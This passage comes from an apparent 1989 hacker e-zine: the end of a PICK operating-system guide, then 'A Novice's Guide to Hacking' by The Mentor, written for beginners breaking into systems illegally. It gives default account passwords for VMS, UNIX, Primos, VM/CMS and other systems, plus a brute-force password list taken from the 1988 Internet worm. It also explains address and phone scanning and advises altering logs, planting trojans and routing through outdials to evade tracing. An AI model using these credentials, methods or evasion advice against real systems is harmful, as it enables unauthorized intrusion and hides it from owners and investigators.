structure is more complicated as some of these files can point to themselves and you can therefore have 'one level' data files. Each file has ITEMS in it. These items are always in ASCII format even the numbers so all DICTIONARIES and DATA files can be displayed and edited. Each ITEM is composed of ATTRIBUTES (what is typically called fields). The key is called the "ITEM-ID". Attributes can have multiple values which may also have multiple subvalues. A danger in the ability to edit everything is that you can edit the file pointers and make them point at garbage. This will cause what is known as a "group format error" which is a phrase meaning that the operating system says your files are garbaged. Certain files have predefined DICTIONARY items. For example the M/DICT first ATTRIBUTE is the D/CODE which tells what kind of item is in the M/DICT. An "A" is an ATTRIBUTE defining item, "D" is a file defining item, "P" is a verb, "PQ" is a PROC, "Q" is a file synonym item and so forth. ------------------- Command Processors: ------------------- The languages you find are an extended BASIC, a retrieval language called ACCESS, ENGLISH and other names depending on which version of PICK you have and an interpreted procedure language called PROC. The command interpreter is called TCL for Terminal Control Language. ------------------------------- How to recognize a PICK system: ------------------------------- The prompt you get is typically "LOGON PLEASE: ". There will always be a "SYSPROG" (system programmer) account and this one has the highest privileges. If you have your user-id wrong, it will say "USER_ID?" followed by the LOGON PLEASE prompt. If you have a bad password, it will prompt "PASSWORD?" followed by the logon prompt. --------------------------------- How to see what is on the system: --------------------------------- Once you are on, you can see what accounts there are by saying "LIST ONLY DICT SYSTEM". Besides SYSPROG, you will see POINTER- FILE (items pointing to binary data strings), SYSPROG-PL (system maintenance PROCS, NEWAC (new account template), ACC (accounting history file), ERRMSG (system error messages), PROCLIB (PROC library) and BLOCK-CONVERT (format of characters printed by use of the BLOCK-PRINT command) To see the files you can type "LIST ONLY MD WITH D/CODE "D]" or LISTFILES (which is a PROC). LISTVERBS and LISTPROCS will tell you what commands are available. ------------------------ Common Commands (VERBS): ------------------------ AS - Assembler BLOCK-PRINT - Print letters as blocks CHARACTERS - Print ASCII character set CHARGES - Total time logged on and CPU activity stats COPY - Copies an item CREATE-FILE - Creates a new dictionary & data file CT file item - Copy an item to terminal DTR radix # - Convert Decimal to Radix (default 16) DUMP frameid - Binary dump of virtual disk frames ECHO ON/OFF - Terminal echoing ON or OFF LISTFILES - List of files LISTPROCS - List of PROCs LISTU - PROC showing who is on the computer LISTVERBS - List all VERBS LOGTO name - Change to another user LOGOFF - Logout MSG - Sends a message to another user. POVF - Print OVerFlow tells how much disc is free PRINT-ERR - Output specified error message number (ERRMSG) RECOVER-FD - Recover editor deleted (FD) item. RUNOFF - Output processor (like VMS runoff and UNIX nroff) SAVE - Backup system to tape or floppy SET-FILE - Create a synonym file called QFILE in your MD SETUP-ASSY - Setup account for assembler (run from SYSPROG) SLEEP - Take a nap for n seconds or until given time SP-STATUS - Printer spooler status T-ATT - Attach the tape drive T-READ - Read from the tape drive T-DET - Detach the tape drive TABS - Display tab stops TERM - Specifies terminal characteristics TIME - Shows current date & time TA-ON/OFF - Typeahead ON or OFF WHAT - Displays system configuration WHERE - Current information on processes WHO - Display your account name (WHO * is for all) -------------- File creation: -------------- CREATE-FILE filename dictmod,dictsep datamod,datasep modulo or mod is the number of contiguous disk groups allocated for a given file and separation is the size of a group. Typically the separation is set to 1. Deleting a file: "DELETE-FILE filename" ---------------- Copying an item: ---------------- "COPY FILE ITEM <CR>" The machine will print: TO: Enter: (optional file) item. Here if you want to copy an item to another name in the same file leave off the filename else put in the file name you want. To delete an item type: "DELETE file item". ---------------------- Access/Recall/English: ---------------------- To look at an item you can either use the editor or the retrieval processor. The two basic commands are LIST and SORT. SORT sorts the file and then does a LIST. To see what dictionary items (such as "SALARY" exist for a file, type "LISTDICTS filename". The structure of the retrieval command is: COMMAND FILE-NAME SELECTION-CRITERIA SORT-CRITERIA OUTPUT-CRITERIA An example is "LIST PAYROLL WITH SALARY > "10000" Another is "SORT M/DICT BY D/CODE" ------- Editor: ------- Pick has a fairly simple text editor. You call it up by typing "ED Filename Itemname". Commands include DEn (delete n lines), EX (exit, don't save), FI (file item), Ln (list n lines), Gn (go to line number 'n'), R/a/b (replace 'a' with 'b') and X (cancel last command). 'I' puts you in insert mode; a <cr> as the first character in the line terminates insert mode. ------ BASIC: ------ Mostly you program the system in a very extended version of BASIC. After editing in your program, you have to compile it by typing "BASIC file item". Actually its not a compilation into machine code. It compiles into a meta-code like some versions of PASCAL compile into P-code. To execute the program, type "RUN file item". Some programs are "cataloged" which means that an item is stored in a special format and a pointer with the name of the program written in the master dictionary so all you have to do is type the name of the program instead of "RUN file item". Some of the commands are familiar like "GOTO", "GOSUB" and "FOR" while many are unique to Pick like those dealing with opening, reading and writing to files. Pick Basic has a number of neat things in it like conversion between ascii and ebcdic which is useful for dealing with stuff from an IBM mainframe. ----- PROC: ----- Proc is the stored procedure langage. The first line of all of them begin with "PQ". Some versions have a different language so you might also see "PQN". PROCs have subroutine calls shown by parenthese () or brackets []. Some commands: C - comment, G - go to a linenumber, IF - Test, IP - input from terminal, O - output text to terminal, P - process commands in output buffer, RI - reset input buffers to null, T - terminal output with special functions like screen clear and X - exit PROC. The processor has two input buffers and two output buffers and if you want to know more you should consult a PROC manual or book. ---- TCL: ---- Many commands take options of (N) for do not stop between pages and (P) for send data to the line printer. For example: "COPY foo bar (n,t)" means copy item 'bar' from file 'foo' to the terminal and do not stop between pages. There are a number of useful terminal control characters: Control-H - Backspace a character " -I - Tab " -Q - XON (restart output - after XOFF) " -R - Retype last line " -S - XOFF (stop output) " -W - Backspace a word " -X - Cancel current input line -------------- Communication: -------------- Pick is not a good communicator. The vast majority of systems are stand-alone running a canned application. Some of the vendors have added some file transfer and networking functions, but typically this is done by another OS when Pick is a guest (such as VM and UNIX). ----------- Privileges: ----------- The Pick system has 3 privilege levels. The lowest does not allow the user to update the master dictionary or use the tape drive. The second does not allow the use of interesting parts of the debugger and certain system maintenance commands. The highest allows full privileges. --------- Security: --------- The system has very little security. Any intermediate hacker can break thru it very easily. You don't have to be elite. Its based on codes put in attributes 5 and 6 of file defining items. The retrieval lock is put in attribute 5 and the update lock in attribute 6. When you logon, the values in attributes 5 and 6 of your account are stored and compared against any file you want to access. A match and your in otherwise you'll get a message that says the file is access protected. You put security on a file by editing the file defining items which means that if you can edit the 'D'-pointer, you can add and remove the security on the items in the file. By the way, if you think the security section is skimpy its because there's not much of it. In earlier versions of the system the passwords were not even encrypted and anyone could get at them if they had a little knowledge and access to the editor! ------------------------------ System Messages (ERRMSG) file: ------------------------------ The messages the system prints out are stored in a file, ERRMSG. So if you are tired of a message like "THE WORD 'item' is ILLEGAL", all you have to do is "ED ERRMSG 5" and say whatever you like. ----------------- That's all Folks: ----------------- There are a few books on the operating system. A WELL equipped bookstore will have some. One source (at least according to the documentation I have is JES & Associates, PO Box 19274, Irvine, CA 92714; phone (714) 786-2211. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Volume 1 , P/HUN Issue #2 , Phile #8 of 9 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +++++++++++++++++++++++++++++++++++++++++++++++++ | The LOD/H Presents | ++++++++++++++++ ++++++++++++++++ X A Novice's Guide to Hacking- 1989 edition / X ========================================= / X by / X The Mentor / X Legion of Doom/Legion of Hackers / X / X December, 1988 / X Merry Christmas Everyone! / X+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/ ********************************************************************** | The author hereby grants permission to reproduce, redistribute, | | or include this file in your g-file section, electronic or print | | newletter, or any other form of transmission that you choose, as | | long as it is kept intact and whole, with no ommissions, delet- | | ions, or changes. (C) The Mentor- Phoenix Project Productions | | 1988,1989 512/441-3088 | ********************************************************************** Introduction: The State of the Hack DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD After surveying a rather large g-file collection, my attention was drawn to the fact that there hasn't been a good introductory file written for absolute beginners since back when Mark Tabas was cranking them out (and almost *everyone* was a beginner!) The Arts of Hacking and Phreaking have changed radically since that time, and as the 90's approach, the hack/phreak community has recovered from the Summer '87 busts (just like it recovered from the Fall '85 busts, and like it will always recover from attempts to shut it down), and the progressive media (from Reality Hackers magazine to William Gibson and Bruce Sterling's cyberpunk fables of hackerdom) is starting to take notice of us for the first time in recent years in a positive light. Unfortunately, it has also gotten more dangerous since the early 80's. Phone cops have more resources, more awareness, and more intelligence that they exhibited in the past. It is becoming more and more difficult to survive as a hacker long enough to become skilled in the art. To this end this file is dedicated . If it can help someone get started, and help them survive to discover new systems and new information, it will have served it's purpose, and served as a partial repayment to all the people who helped me out when I was a beginner. Contents DDDDDDDD This file will be divided into four parts: Part 1: What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety Part 2: Packet Switching Networks: Telenet- How it Works, How to Use it, Outdials, Network Servers, Private PADs Part 3: Identifying a Computer, How to Hack In, Operating System Defaults Part 4: Conclusion- Final Thoughts, Books to Read, Boards to Call, Acknowledgements Part One: The Basics DDDDDDDDDDDDDDDDDDDD As long as there have been computers, there have been hackers. In the 50's at the Massachusets Institute of Technology (MIT), students devoted much time and energy to ingenious exploration of the computers. Rules and the law were disregarded in their pursuit for the 'hack'. Just as they were enthralled with their pursuit of information, so are we. The thrill of the hack is not in breaking the law, it's in the pursuit and capture of knowledge. To this end, let me contribute my suggestions for guidelines to follow to ensure that not only you stay out of trouble, but you pursue your craft without damaging the computers you hack into or the companies who own them. I. Do not intentionally damage *any* system. II. Do not alter any system files other than ones needed to ensure your escape from detection and your future access (Trojan Horses, Altering Logs, and the like are all necessary to your survival for as long as possible.) III. Do not leave your (or anyone else's) real name, real handle, or real phone number on any system that you access illegally. They *can* and will track you down from your handle! IV. Be careful who you share information with. Feds are getting trickier. Generally, if you don't know their voice phone number, name, and occupation or haven't spoken with them voice on non-info trading conversations, be wary. V. Do not leave your real phone number to anyone you don't know. This includes logging on boards, no matter how k-rad they seem. If you don't know the sysop, leave a note telling some trustworthy people that will validate you. VI. Do not hack government computers. Yes, there are government systems that are safe to hack, but they are few and far between. And the government has inifitely more time and resources to track you down than a company who has to make a profit and justify expenses. VII. Don't use codes unless there is *NO* way around it (you don't have a local telenet or tymnet outdial and can't connect to anything 800...) You use codes long enough, you will get caught. Period. VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law. It doesn't hurt to store everything encrypted on your hard disk, or keep your notes buried in the backyard or in the trunk of your car. You may feel a little funny, but you'll feel a lot funnier when you when you meet Bruno, your transvestite cellmate who axed his family to death. IX. Watch what you post on boards. Most of the really great hackers in the country post *nothing* about the system they're currently working except in the broadest sense (I'm working on a UNIX, or a COSMOS, or something generic. Not "I'm hacking into General Electric's Voice Mail System" or something inane and revealing like that.) X. Don't be afraid to ask questions. That's what more experienced hackers are for. Don't expect *everything* you ask to be answered, though. There are some things (LMOS, for instance) that a begining hacker shouldn't mess with. You'll either get caught, or screw it up for others, or both. XI. Finally, you have to actually hack. You can hang out on boards all you want, and you can read all the text files in the world, but until you actually start doing it, you'll never know what it's all about. There's no thrill quite the same as getting into your first system (well, ok, I can think of a couple of bigger thrills, but you get the picture.) One of the safest places to start your hacking career is on a computer system belonging to a college. University computers have notoriously lax security, and are more used to hackers, as every college computer depart- ment has one or two, so are less likely to press charges if you should be detected. But the odds of them detecting you and having the personel to committ to tracking you down are slim as long as you aren't destructive. If you are already a college student, this is ideal, as you can legally explore your computer system to your heart's desire, then go out and look for similar systems that you can penetrate with confidence, as you're already familar with them. So if you just want to get your feet wet, call your local college. Many of them will provide accounts for local residents at a nominal (under $20) charge. Finally, if you get caught, stay quiet until you get a lawyer. Don't vol- unteer any information, no matter what kind of 'deals' they offer you. Nothing is binding unless you make the deal through your lawyer, so you might as well shut up and wait. Part Two: Networks DDDDDDDDDDDDDDDDDD The best place to begin hacking (other than a college) is on one of the bigger networks such as Telenet. Why? First, there is a wide variety of computers to choose from, from small Micro-Vaxen to huge Crays. Second, the networks are fairly well documented. It's easier to find someone who can help you with a problem off of Telenet than it is to find assistance concerning your local college computer or high school machine. Third, the networks are safer. Because of the enormous number of calls that are fielded every day by the big networks, it is not financially practical to keep track of where every call and connection are made from. It is also very easy to disguise your location using the network, which makes your hobby much more secure. Telenet has more computers hooked to it than any other system in the world once you consider that from Telenet you have access to Tymnet, ItaPAC, JANET, DATAPAC, SBDN, PandaNet, THEnet, and a whole host of other networks, all of which you can connect to from your terminal. The first step that you need to take is to identify your local dialup port. This is done by dialing 1-800-424-9494 (1200 7E1) and connecting. It will spout some garbage at you and then you'll get a prompt saying 'TERMINAL='. This is your terminal type. If you have vt100 emulation, type it in now. Or just hit return and it will default to dumb terminal mode. You'll now get a prompt that looks like a @. From here, type @c mail <cr> and then it will ask for a Username. Enter 'phones' for the username. When it asks for a password, enter 'phones' again. From this point, it is menu driven. Use this to locate your local dialup, and call it back locally. If you don't have a local dialup, then use whatever means you wish to connect to one long distance (more on this later.) When you call your local dialup, you will once again go through the TERMINAL= stuff, and once again you'll be presented with a @. This prompt lets you know you are connected to a Telenet PAD. PAD stands for either Packet Assembler/Disassembler (if you talk to an engineer), or Public Access Device (if you talk to Telenet's marketing people.) The first description is more correct. Telenet works by taking the data you enter in on the PAD you dialed into, bundling it into a 128 byte chunk (normally... this can be changed), and then transmitting it at speeds ranging from 9600 to 19,200 baud to another PAD, who then takes the data and hands it down to whatever computer or system it's connected to. Basically, the PAD allows two computers that have different baud rates or communication protocols to communicate with each other over a long distance. Sometimes you'll notice a time lag in the remote machines response. This is called PAD Delay, and is to be expected when you're sending data through several different links. What do you do with this PAD? You use it to connect to remote computer systems by typing 'C' for connect and then the Network User Address (NUA) of the system you want to go to. An NUA takes the form of 031103130002520 X___/X___/X___/ | | | | | |____ network address | |_________ area prefix |______________ DNIC This is a summary of DNIC's (taken from Blade Runner's file on ItaPAC) according to their country and network name. DNIC Network Name Country DNIC Network Name Country _______________________________________________________________________________ | 02041 Datanet 1 Netherlands | 03110 Telenet USA 02062 DCS Belgium | 03340 Telepac Mexico 02080 Transpac France | 03400 UDTS-Curacau Curacau 02284 Telepac Switzerland | 04251 Isranet Israel 02322 Datex-P Austria | 04401 DDX-P Japan 02329 Radaus Austria | 04408 Venus-P Japan 02342 PSS UK | 04501 Dacom-Net South Korea 02382 Datapak Denmark | 04542 Intelpak Singapore 02402 Datapak Sweden | 05052 Austpac Australia 02405 Telepak Sweden | 05053 Midas Australia 02442 Finpak Finland | 05252 Telepac Hong Kong 02624 Datex-P West Germany | 05301 Pacnet New Zealand 02704 Luxpac Luxembourg | 06550 Saponet South Africa 02724 Eirpak Ireland | 07240 Interdata Brazil 03020 Datapac Canada | 07241 Renpac Brazil 03028 Infogram Canada | 09000 Dialnet USA 03103 ITT/UDTS USA | 07421 Dompac French Guiana 03106 Tymnet USA | There are two ways to find interesting addresses to connect to. The first and easiest way is to obtain a copy of the LOD/H Telenet Directory from the LOD/H Technical Journal #4 or 2600 Magazine. Jester Sluggo also put out a good list of non-US addresses in Phrack Inc. Newsletter Issue 21. These files will tell you the NUA, whether it will accept collect calls or not, what type of computer system it is (if known) and who it belongs to (also if known.) The second method of locating interesting addresses is to scan for them manually. On Telenet, you do not have to enter the 03110 DNIC to connect to a Telenet host. So if you saw that 031104120006140 had a VAX on it you wanted to look at, you could type @c 412 614 (0's can be ignored most of the time.) If this node allows collect billed connections, it will say 412 614 CONNECTED and then you'll possibly get an identifying header or just a Username: prompt. If it doesn't allow collect connections, it will give you a message such as 412 614 REFUSED COLLECT CONNECTION with some error codes out to the right, and return you to the @ prompt. There are two primary ways to get around the REFUSED COLLECT message. The first is to use a Network User Id (NUI) to connect. An NUI is a username/pw combination that acts like a charge account on Telenet. To collect to node 412 614 with NUI junk4248, password 525332, I'd type the following: @c 412 614,junk4248,525332 <---- the 525332 will *not* be echoed to the screen. The problem with NUI's is that they're hard to come by unless you're a good social engineer with a thorough knowledge of Telenet (in which case you probably aren't reading this section), or you have someone who can provide you with them. The second way to connect is to use a private PAD, either through an X.25 PAD or through something like Netlink off of a Prime computer (more on these two below.) The prefix in a Telenet NUA oftentimes (not always) refers to the phone Area Code that the computer is located in (i.e. 713 xxx would be a computer in Houston, Texas.) If there's a particular area you're interested in, (say, New York City 914), you could begin by typing @c 914 001 <cr>. If it connects, you make a note of it and go on to 914 002. You do this until you've found some interesting systems to play with. Not all systems are on a simple xxx yyy address. Some go out to four or five digits (914 2354), and some have decimal or numeric extensions (422 121A = 422 121.01). You have to play with them, and you never know what you're going to find. To fully scan out a prefix would take ten million attempts per prefix. For example, if I want to scan 512 completely, I'd have to start with 512 00000.00 and go through 512 00000.99, then increment the address by 1 and try 512 00001.00 through 512 00001.99. A lot of scanning. There are plenty of neat computers to play with in a 3-digit scan, however, so don't go berserk with the extensions. Sometimes you'll attempt to connect and it will just be sitting there after one or two minutes. In this case, you want to abort the connect attempt by sending a hard break (this varies with different term programs, on Procomm, it's ALT-B), and then when you get the @ prompt back, type 'D' for disconnect. If you connect to a computer and wish to disconnect, you can type <cr> @ <cr> and you it should say TELENET and then give you the @ prompt. From there, type D to disconnect or CONT to re-connect and continue your session uninterrupted. Outdials, Network Servers, and PADs DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD In addition to computers, an NUA may connect you to several other things. One of the most useful is the outdial. An outdial is nothing more than a modem you can get to over telenet- similar to the PC Pursuit concept, except that these don't have passwords on them most of the time. When you connect, you will get a message like 'Hayes 1200 baud outdial, Detroit, MI', or 'VEN-TEL 212 Modem', or possibly 'Session 1234 established on Modem 5588'. The best way to figure out the commands on these is to type ? or H or HELP- this will get you all the information that you need to use one. Safety tip here- when you are hacking *any* system through a phone dialup, always use an outdial or a diverter, especially if it is a local phone number to you. More people get popped hacking on local computers than you can imagine, Intra-LATA calls are the easiest things in the world to trace inexp- ensively. Another nice trick you can do with an outdial is use the redial or macro function that many of them have. First thing you do when you connect is to invoke the 'Redial Last Number' facility. This will dial the last number used, which will be the one the person using it before you typed. Write down the number, as no one would be calling a number without a computer on it. This is a good way to find new systems to hack. Also, on a VENTEL modem, type 'D' for Display and it will display the five numbers stored as macros in the modem's memory. There are also different types of servers for remote Local Area Networks (LAN) that have many machine all over the office or the nation connected to them. I'll discuss identifying these later in the computer ID section. And finally, you may connect to something that says 'X.25 Communication PAD' and then some more stuff, followed by a new @ prompt. This is a PAD just like the one you are on, except that all attempted connections are billed to the PAD, allowing you to connect to those nodes who earlier refused collect connections. This also has the added bonus of confusing where you are connecting from. When a packet is transmitted from PAD to PAD, it contains a header that has the location you're calling from. For instance, when you first connected to Telenet, it might have said 212 44A CONNECTED if you called from the 212 area code. This means you were calling PAD number 44A in the 212 area. That 21244A will be sent out in the header of all packets leaving the PAD. Once you connect to a private PAD, however, all the packets going out from *it* will have it's address on them, not yours. This can be a valuable buffer between yourself and detection. Phone Scanning DDDDDDDDDDDDDD Finally, there's the time-honored method of computer hunting that was made famous among the non-hacker crowd by that Oh-So-Technically-Accurate movie Wargames. You pick a three digit phone prefix in your area and dial every number from 0000 --> 9999 in that prefix, making a note of all the carriers you find. There is software available to do this for nearly every computer in the world, so you don't have to do it by hand. Part Three: I've Found a Computer, Now What? DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD This next section is applicable universally. It doesn't matter how you found this computer, it could be through a network, or it could be from carrier scanning your High School's phone prefix, you've got this prompt this prompt, what the hell is it? I'm *NOT* going to attempt to tell you what to do once you're inside of any of these operating systems. Each one is worth several G-files in its own right. I'm going to tell you how to identify and recognize certain OpSystems, how to approach hacking into them, and how to deal with something that you've never seen before and have know idea what it is. VMS- The VAX computer is made by Digital Equipment Corporation (DEC), and runs the VMS (Virtual Memory System) operating system. VMS is characterized by the 'Username:' prompt. It will not tell you if you've entered a valid username or not, and will disconnect you after three bad login attempts. It also keeps track of all failed login attempts and informs the owner of the account next time s/he logs in how many bad login attempts were made on the account. It is one of the most secure operating systems around from the outside, but once you're in there are many things that you can do to circumvent system security. The VAX also has the best set of help files in the world. Just type HELP and read to your heart's content. Common Accounts/Defaults: [username: password [[,password]] ] SYSTEM: OPERATOR or MANAGER or SYSTEM or SYSLIB OPERATOR: OPERATOR SYSTEST: UETP SYSMAINT: SYSMAINT or SERVICE or DIGITAL FIELD: FIELD or SERVICE GUEST: GUEST or unpassworded DEMO: DEMO or unpassworded DECNET: DECNET DEC-10- An earlier line of DEC computer equipment, running the TOPS-10 operating system. These machines are recognized by their '.' prompt. The DEC-10/20 series are remarkably hacker-friendly, allowing you to enter several important commands without ever logging into the system. Accounts are in the format [xxx,yyy] where xxx and yyy are integers. You can get a listing of the accounts and the process names of everyone on the system before logging in with the command .systat (for SYstem STATus). If you seen an account that reads [234,1001] BOB JONES, it might be wise to try BOB or JONES or both for a password on this account. To login, you type .login xxx,yyy and then type the password when prompted for it. The system will allow you unlimited tries at an account, and does not keep records of bad login attempts. It will also inform you if the UIC you're trying (UIC = User Identification Code, 1,2 for example) is bad. Common Accounts/Defaults: 1,2: SYSLIB or OPERATOR or MANAGER 2,7: MAINTAIN 5,30: GAMES UNIX- There are dozens of different machines out there that run UNIX. While some might argue it isn't the best operating system in the world, it is certainly the most widely used. A UNIX system will usually have a prompt like 'login:' in lower case. UNIX also will give you unlimited shots at logging in (in most cases), and there is usually no log kept of bad attempts. Common Accounts/Defaults: (note that some systems are case sensitive, so use lower case as a general rule. Also, many times the accounts will be unpassworded, you'll just drop right in!) root: root admin: admin sysadmin: sysadmin or admin unix: unix uucp: uucp rje: rje guest: guest demo: demo daemon: daemon sysbin: sysbin Prime- Prime computer company's mainframe running the Primos operating system. The are easy to spot, as the greet you with 'Primecon 18.23.05' or the like, depending on the version of the operating system you run into. There will usually be no prompt offered, it will just look like it's sitting there. At this point, type 'login <username>'. If it is a pre-18.00.00 version of Primos, you can hit a bunch of ^C's for the password and you'll drop in. Unfortunately, most people are running versions 19+. Primos also comes with a good set of help files. One of the most useful features of a Prime on Telenet is a facility called NETLINK. Once you're inside, type NETLINK and follow the help files. This allows you to connect to NUA's all over the world using the 'nc' command. For example, to connect to NUA 026245890040004, you would type @nc :26245890040004 at the netlink prompt. Common Accounts/Defaults: PRIME PRIME or PRIMOS PRIMOS_CS PRIME or PRIMOS PRIMENET PRIMENET SYSTEM SYSTEM or PRIME NETLINK NETLINK TEST TEST GUEST GUEST GUEST1 GUEST HP-x000- This system is made by Hewlett-Packard. It is characterized by the ':' prompt. The HP has one of the more complicated login sequences around- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'. Fortunately, some of these fields can be left blank in many cases. Since any and all of these fields can be passworded, this is not the easiest system to get into, except for the fact that there are usually some unpassworded accounts around. In general, if the defaults don't work, you'll have to brute force it using the common password list (see below.) The HP-x000 runs the MPE operat- ing system, the prompt for it will be a ':', just like the logon prompt. Common Accounts/Defaults: MGR.TELESUP,PUB User: MGR Acct: HPONLY Grp: PUB MGR.HPOFFICE,PUB unpassworded MANAGER.ITF3000,PUB unpassworded FIELD.SUPPORT,PUB user: FLD, others unpassworded MAIL.TELESUP,PUB user: MAIL, others unpassworded MGR.RJE unpassworded FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96 unpassworded MGR.TELESUP,PUB,HPONLY,HP3 unpassworded IRIS- IRIS stands for Interactive Real Time Information System. It orig- inally ran on PDP-11's, but now runs on many other minis. You can spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner, and the ACCOUNT ID? prompt. IRIS allows unlimited tries at hacking in, and keeps no logs of bad attempts. I don't know any default passwords, so just try the common ones from the password database below. Common Accounts: MANAGER BOSS SOFTWARE DEMO PDP8 PDP11 ACCOUNTING VM/CMS- The VM/CMS operating system runs in International Business Machines (IBM) mainframes. When you connect to one of these, you will get message similar to 'VM/370 ONLINE', and then give you a '.' prompt, just like TOPS-10 does. To login, you type 'LOGON <username>'. Common Accounts/Defaults are: AUTOLOG1: AUTOLOG or AUTOLOG1 CMS: CMS CMSBATCH: CMS or CMSBATCH EREP: EREP MAINT: MAINT or MAINTAIN OPERATNS: OPERATNS or OPERATOR OPERATOR: OPERATOR RSCS: RSCS SMART: SMART SNA: SNA VMTEST: VMTEST VMUTIL: VMUTIL VTAM: VTAM NOS- NOS stands for Networking Operating System, and runs on the Cyber computer made by Control Data Corporation. NOS identifies itself quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978,1987'. The first prompt you will get will be FAMILY:. Just hit return here. Then you'll get a USER NAME: prompt. Usernames are typically 7 alpha-numerics characters long, and are *extremely* site dependent. Operator accounts begin with a digit, such as 7ETPDOC. Common Accounts/Defaults: $SYSTEM unknown SYSTEMV unknown Decserver- This is not truly a computer system, but is a network server that has many different machines available from it. A Decserver will say 'Enter Username>' when you first connect. This can be anything, it doesn't matter, it's just an identifier. Type 'c', as this is the least conspicuous thing to enter. It will then present you with a 'Local>' prompt. From here, you type 'c <systemname>' to connect to a system. To get a list of system names, type 'sh services' or 'sh nodes'. If you have any problems, online help is available with the 'help' command. Be sure and look for services named 'MODEM' or 'DIAL' or something similar, these are often outdial modems and can be useful! GS/1- Another type of network server. Unlike a Decserver, you can't predict what prompt a GS/1 gateway is going to give you. The default prompt it 'GS/1>', but this is redifinable by the system administrator. To test for a GS/1, do a 'sh d'. If that prints out a large list of defaults (terminal speed, prompt, parity, etc...), you are on a GS/1. You connect in the same manner as a Decserver, typing 'c <systemname>'. To find out what systems are available, do a 'sh n' or a 'sh c'. Another trick is to do a 'sh m', which will sometimes show you a list of macros for logging onto a system. If there is a macro named VAX, for instance, type 'do VAX'. The above are the main system types in use today. There are hundreds of minor variants on the above, but this should be enough to get you started. Unresponsive Systems DDDDDDDDDDDDDDDDDDDD Occasionally you will connect to a system that will do nothing but sit there. This is a frustrating feeling, but a methodical approach to the system will yield a response if you take your time. The following list will usually make *something* happen. 1) Change your parity, data length, and stop bits. A system that won't re- spond at 8N1 may react at 7E1 or 8E2 or 7S2. If you don't have a term program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE, with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one. While having a good term program isn't absolutely necessary, it sure is helpful. 2) Change baud rates. Again, if your term program will let you choose odd baud rates such as 600 or 1100, you will occasionally be able to penetrate some very interesting systems, as most systems that depend on a strange baud rate seem to think that this is all the security they need... 3) Send a series of <cr>'s. 4) Send a hard break followed by a <cr>. 5) Type a series of .'s (periods). The Canadian network Datapac responds to this. 6) If you're getting garbage, hit an 'i'. Tymnet responds to this, as does a MultiLink II. 7) Begin sending control characters, starting with ^A --> ^Z. 8) Change terminal emulations. What your vt100 emulation thinks is garbage may all of a sudden become crystal clear using ADM-5 emulation. This also relates to how good your term program is. 9) Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO, JOIN, HELP, and anything else you can think of. 10) If it's a dialin, call the numbers around it and see if a company answers. If they do, try some social engineering. Brute Force Hacking DDDDDDDDDDDDDDDDDDD There will also be many occasions when the default passwords will not work on an account. At this point, you can either go onto the next system on your list, or you can try to 'brute-force' your way in by trying a large database of passwords on that one account. Be careful, though! This works fine on systems that don't keep track of invalid logins, but on a system like a VMS, someone is going to have a heart attack if they come back and see '600 Bad Login Attempts Since Last Session' on their account. There are also some operating systems that disconnect after 'x' number of invalid login attempts and refuse to allow any more attempts for one hour, or ten minutes, or some- times until the next day. The following list is taken from my own password database plus the data- base of passwords that was used in the Internet UNIX Worm that was running around in November of 1988. For a shorter group, try first names, computer terms, and obvious things like 'secret', 'password', 'open', and the name of the account. Also try the name of the company that owns the computer system (if known), the company initials, and things relating to the products the company makes or deals with. Password List ============= aaa daniel jester rascal academia danny johnny really ada dave joseph rebecca adrian deb joshua remote aerobics debbie judith rick airplane deborah juggle reagan albany december julia robot albatross desperate kathleen robotics albert develop kermit rolex alex diet kernel ronald alexander digital knight rosebud algebra discovery lambda rosemary alias disney larry roses alpha dog lazarus ruben alphabet drought lee rules ama duncan leroy ruth amy easy lewis sal analog eatme light saxon anchor edges lisa scheme andy edwin louis scott andrea egghead lynne scotty animal eileen mac secret answer einstein macintosh sensor anything elephant mack serenity arrow elizabeth maggot sex arthur ellen magic shark asshole emerald malcolm sharon athena engine mark shit atmosphere engineer markus shiva bacchus enterprise marty shuttle badass enzyme marvin simon bailey euclid master simple banana evelyn maurice singer bandit extension merlin single banks fairway mets smile bass felicia michael smiles batman fender michelle smooch beauty fermat mike smother beaver finite minimum snatch beethoven flower minsky snoopy beloved foolproof mogul soap benz football moose socrates beowulf format mozart spit berkeley forsythe nancy spring berlin fourier napoleon subway beta fred network success beverly friend newton summer bob frighten next super brenda fun olivia support brian gabriel oracle surfer bridget garfield orca suzanne broadway gauss orwell tangerine bumbling george osiris tape cardinal gertrude outlaw target carmen gibson oxford taylor carolina ginger pacific telephone caroline gnu painless temptation castle golf pam tiger cat golfer paper toggle celtics gorgeous password tomato change graham pat toyota charles gryphon patricia trivial charming guest penguin unhappy charon guitar pete unicorn chester hacker peter unknown cigar harmony philip urchin classic harold phoenix utility coffee harvey pierre vicky coke heinlein pizza virginia collins hello plover warren comrade help polynomial water computer herbert praise weenie condo honey prelude whatnot condom horse prince whitney cookie imperial protect will cooper include pumpkin william create ingres puppet willie creation innocuous rabbit winston creator irishman rachmaninoff wizard cretin isis rainbow wombat daemon japan raindrop yosemite dancer jessica random zap Part Four: Wrapping it up! DDDDDDDDDDDDDDDDDDDDDDDDDD I hope this file has been of some help in getting started. If you're asking yourself the question 'Why hack?', then you've probably wasted a lot of time reading this, as you'll never understand. For those of you who have read this and found it useful, please send a tax-deductible donation of $5.00 (or more!) in the name of the Legion of Doom to: The American Cancer Society 90 Park Avenue New York, NY 10016 ****************************************************************************** References: 1) Introduction to ItaPAC by Blade Runner Telecom Security Bulletin #1 2) The 